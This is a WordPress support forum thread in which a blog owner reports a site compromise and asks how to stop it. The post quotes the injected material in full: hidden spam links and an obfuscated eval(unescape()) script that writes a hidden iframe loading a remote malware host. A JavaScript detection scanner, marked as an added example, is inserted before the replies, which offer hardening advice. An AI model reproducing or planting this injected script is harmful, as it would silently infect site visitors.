Title: WordPress Exploit: script inserted into code
Last modified: August 19, 2016

---

# WordPress Exploit: script inserted into code

 *  [andiz](https://wordpress.org/support/users/andiz/)
 * (@andiz)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/)
 * Lately some of my WordPress blogs have been targeted by some hacker. Every time
   I check out the source of my blogs I see these kinds of links:
 *     ```
       </body></html><font style='position: absolute;overflow: hidden;height: 0;width: 0'>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra.htm"; title="buy viagra">buy viagra</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online.htm"; title="buy viagra online">buy viagra online</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=buy-viagra-online-viagra.htm"; title="buy viagra online viagra">buy viagra online viagra</a>
       <a href="http://recsports.utk.edu/E-PostMan%20V1.0/OD/3/page.php?q=viagra-buy.htm"; title="viagra buy">viagra buy</a>
       ```
   
 * It has nothing to do with my theme, I’m using my own theme and I am 100% sure
   that the theme is not the source of the problem.
 * I have been monitoring my weblogs to see what the cause of the problem is. Here
   is a list of what I tried to stop it:
 * – Upgrade to the latest WP (Yet it kept coming back)
    – Secure WP admin with htaccess (No effect)
    – Change FTP password
    – Check permissions of files and folders
    – Check plugins
 * Another thing that I noticed is the following. Almost all of my themes also had
   the following code inserted at the end of the source code:
 *     ```
       <Script>
       <!--
       var d=document;
       eval( unescape( "%69%66%20%28%21%6d%79%69%61%29%20%7b%76%61%72%20%69%20%3d%20%30%3b%77%68%69%6c%65%28%28%65%6c%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%27%69%66%72%61%6d%65%27%29%29%2e%6c%65%6e%67%74%68%29%7b%69%66%28%20%28%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%3d%3d%27%6e%6f%6e%65%27%20%7c%7c%20%65%6c%5b%69%5d%2e%73%74%79%6c%65%2e%76%69%73%69%62%69%6c%69%74%79%20%3d%3d%27%68%69%64%64%65%6e%27%20%7c%7c%20%28%65%6c%5b%69%5d%2e%77%69%64%74%68%3c%35%20&&%20%65%6c%5b%69%5d%2e%68%65%69%67%68%74%3c%35%29%29%20&&%20%65%6c%5b%69%5d%2e%6e%61%6d%65%21%3d%63%31%20%29%20%7b%65%6c%5b%69%5d%2e%70%61%72%65%6e%74%4e%6f%64%65%2e%72%65%6d%6f%76%65%43%68%69%6c%64%28%65%6c%5b%69%5d%29%3b%7d%69%20%2b%2b%3b%7d%20%64%2e%77%72%69%74%65%28%27%3c%49%46%52%41%4d%45%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%6d%79%2d%70%61%67%65%2d%64%65%2e%69%6e%66%6f%2f%69%6e%2e%63%67%69%3f%32&%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%35%34%35%37%30%29%2b%27%33%66%61%66%61%30%30%64%36%62%5c%27%20%77%69%64%74%68%3d%31%30%37%20%68%65%69%67%68%74%3d%35%31%30%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%49%46%52%41%4d%45%20%3e%27%29%3b%0d%0a%09%09%7d%76%61%72%20%6d%79%69%61%3d%74%72%75%65%3b" )); var c1439772935;
       //-->
       </Script>
       ```
   
 * What I noticed is that the only solution was to rewrite the old WordPress files
   with the ones that I downloaded. I finally found where the code was being inserted:
   index.php in the root folder of the weblog.
 * I would like to know the following things:
 * – Is this because of my setup or is this some new WP exploit?
    – What can I do to stop these kinds of exploits in the future?
 * Thanks!
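
A static check for the two injections described in the post above, as an added example that is not part of the original thread. The names `scan`, `decodePercent` and `SAMPLE` are assumptions, and the sample input is constructed with a placeholder host; the percent-encoded payload is decoded as text and never evaluated.

```javascript
'use strict';
// Static triage for the two injections shown in this thread. The payload is
// decoded as data only; nothing from the scanned file is ever executed.

// eval(unescape("<percent-encoded string>")) as injected into the theme files.
const EVAL_UNESCAPE = /eval\s*\(\s*unescape\s*\(\s*(["'])([\s\S]*?)\1\s*\)\s*\)/gi;
// Inline style that hides an element (zero size or display:none).
const HIDDEN_STYLE = /style\s*=\s*(["'])[^"']*(?:height\s*:\s*0|width\s*:\s*0|display\s*:\s*none)[^"']*\1/i;

// Decode %XX escapes; raw characters (the payload mixes both) pass through.
function decodePercent(s) {
  return s.replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

function scan(source) {
  const findings = [];
  for (const m of source.matchAll(EVAL_UNESCAPE)) {
    const decoded = decodePercent(m[2]);
    findings.push({
      type: 'eval-unescape',
      offset: m.index,
      writesIframe: /\.write\s*\(/.test(decoded) && /<iframe/i.test(decoded),
      urls: decoded.match(/https?:\/\/[^\s'"\\<>]+/gi) || [],
    });
  }
  // Markup after the closing </html> tag: hidden container holding links.
  const end = source.search(/<\/html\s*>/i);
  if (end !== -1) {
    const tail = source.slice(end);
    const hrefs = [...tail.matchAll(/<a\s[^>]*href\s*=\s*["']([^"']+)["']/gi)].map((m) => m[1]);
    if (hrefs.length > 0 && HIDDEN_STYLE.test(tail)) {
      findings.push({ type: 'hidden-links-after-html', offset: end, urls: hrefs });
    }
  }
  return findings;
}

// Constructed sample, not the payload from the post; example.invalid is a placeholder.
const SAMPLE = [
  "<html><body>post</body></html><font style='position: absolute;height: 0;width: 0'>",
  '<a href="http://example.invalid/page.php?q=spam" title="spam">spam</a></font>',
  '<script>eval(unescape("%64.write(%27%3Ciframe src=http://example.invalid/in.cgi%3E%27)"));</script>',
].join('\n');

console.log(JSON.stringify(scan(SAMPLE), null, 2));
```

Run over the contents of `index.php` and the theme files, any finding marks a file to restore from a clean copy, and the decoded URLs give strings to search for in the rest of the installation.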

Viewing 6 replies - 16 through 21 (of 21 total)


 *  [macsoft3](https://wordpress.org/support/users/macsoft3/)
 * (@macsoft3)
 * [17 years, 12 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718256)
 * I would create a new administrative username for WP deleting all others. If they
   know your administrative username, they can just run a program to guess the password
   just like guessing a PIN number.
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718258)
 * Attack repeated. I’ve already changed password and did all the stuff, but they
   somehow managed to change index files to files pointing to their site pizdec 
   dot ru. It is other guys using the same software – previous attack used to promote
   another site.
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718259)
 * segal, I **really** recommend using my [post-logger](http://www.village-idiot.org/post-logger)
   plugin.
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718260)
 * > segal, I really recommend using my post-logger plugin.
 * Thanks, installed.
 *  [Sonika](https://wordpress.org/support/users/sonika/)
 * (@sonika)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718269)
 * Maybe the plugin “anti xss attack” will help you?
    for wp 2.5: [http://mywordpress.ru/plugins/anti-xss-attack/2/](http://mywordpress.ru/plugins/anti-xss-attack/2/)
    for wp 2.3.3: [http://maxsite.org/anti-xss-attack-update](http://maxsite.org/anti-xss-attack-update)
 *  [segal](https://wordpress.org/support/users/segal/)
 * (@segal)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718270)
 * Thank you!


The topic ‘WordPress Exploit: script inserted into code’ is closed to new replies.

 * In: [Developing with WordPress](https://wordpress.org/support/forum/wp-advanced/)
 * 21 replies
 * 12 participants
 * Last reply from: [segal](https://wordpress.org/support/users/segal/)
 * Last activity: [17 years, 11 months ago](https://wordpress.org/support/topic/wordpress-exploit-script-inserted-into-code/page/2/#post-718270)
 * Status: not resolved

